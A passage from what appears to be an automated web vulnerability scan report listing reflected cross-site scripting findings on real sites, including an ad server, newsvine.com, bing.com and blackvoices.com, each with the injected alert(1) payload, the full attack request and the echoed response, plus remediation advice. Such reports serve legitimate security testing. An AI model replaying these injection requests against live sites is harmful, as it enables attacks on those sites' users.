Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6410
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:47 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSEL1295550373680();
var _SEL1295550373680_Instance =
{
click : "dec58</script><script>alert(1)</script>71466742f94",
clickThruUrl: "http://clk.redcated/go/296652509/direct;ai.200329627;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

5.290. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17000'-alert(1)-'f899d3d5d6a was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/296652509/direct;/01?click=17000'-alert(1)-'f899d3d5d6a HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6300
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:48 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'');
else
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'17000'-alert(1)-'f899d3d5d6a');
}
else
{
_strContentSEL1295550373680 = '<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'17000'-alert(1)-'f899d3d5d6a\')(new Image).src=
...[SNIP]...

5.291. http://redcated/ULA/iview/296652509/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9618f'%3b93d1eb33974 was submitted in the REST URL parameter 4. This input was echoed as 9618f';93d1eb33974 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/296652509/direct9618f'%3b93d1eb33974 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6322
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:22:34 GMT
Connection: close

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/UXULASONYSEL/BloggieHoliday_HD_PC/Flash_300x250_HD_PC_promo.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/296652509/direct9618f';93d1eb33974;ai.200329627;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/296652509/direct9618f';93d1eb33974;ai.200329627;ct.1/01" />
...[SNIP]...

5.292. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87a3"><script>alert(1)</script>91400ea4a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ULA/iview/296652509/direct;/01?click=&b87a3"><script>alert(1)</script>91400ea4a5a=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6390
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:56 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'&b87a3"><script>alert(1)</script>91400ea4a5a=1\')(new Image).src=\'&b87a3">
...[SNIP]...

5.293. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8f'-alert(1)-'1d3891b1941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/296652509/direct;/01?click=&d5f8f'-alert(1)-'1d3891b1941=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6315
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:02 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'');
else
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'&d5f8f'-alert(1)-'1d3891b1941=1');
}
else
{
_strContentSEL1295550373680 = '<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'&d5f8f'-alert(1)-'1d3891b1941=1\')(new Image)
...[SNIP]...

5.294. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d075"-alert(1)-"276dcba3107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/296652509/direct;/01?click=&5d075"-alert(1)-"276dcba3107=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6315
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:57 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSEL1295550373680();
var _SEL1295550373680_Instance =
{
click : "&5d075"-alert(1)-"276dcba3107=1",
clickThruUrl: "http://clk.redcated/go/296652509/direct;ai.200329627;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

5.295. http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2efa1"-alert(1)-"fb67b00e4a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2efa1"-alert(1)-"fb67b00e4a1=1 HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:22 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=45f73cc22cc66ac775a363e022c73cd5; expires=Sat, 25-Jan-2031 03:05:22 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
"";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1654552","http://wbenedetti.newsvine.com/?2efa1"-alert(1)-"fb67b00e4a1=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.296. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9b0'-alert(1)-'2db30f3531a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/4d9b0'-alert(1)-'2db30f3531a HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b71a9b3017a54017a35566ee283bce63
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001610
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:45 GMT
Content-Length: 29845
Connection: close
Set-Cookie: BID=aad102ff367f44958a5d618fc0b05aaf; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: CID=a338111f9c4c4497b06acadac82d3793; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: CDate=1/30/2011 5:09:45 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: VE_LSV=cache=0; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: _SS=SID=D461A8D8FB0847019B5374FB460A2CCE; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c706a350569bb465b91fab01f1e55ad73; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/4d9b0'-alert(1)-'2db30f3531a';</script>
...[SNIP]...

5.297. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b1ec"-alert(1)-"52123b4735c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:9b1ec"-alert(1)-"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.2614838093.3830776576; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:20 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31115
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:9b1ec"-alert(1)-"52123b4735c";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:9b1ec\"-alert(1)-\"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

5.298. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3897</script><script>alert(1)</script>770d674eae7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1155220301.3818652416; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:21 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

5.299. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4b86</script><script>alert(1)</script>2267ebd2b1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*e4b86</script><script>alert(1)</script>2267ebd2b1e/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.903299917.585433600; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:23 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*e4b86</script><script>alert(1)</script>2267ebd2b1e/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

5.300. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b318</script><script>alert(1)</script>cd70b89820e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com8b318</script><script>alert(1)</script>cd70b89820e/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.970474317.387515136; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:24 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com8b318</script><script>alert(1)</script>cd70b89820e/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

5.301. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d46</script><script>alert(1)</script>07c8793dc9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334838204.1239171917.4086825728; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:25 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.302. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

Summary

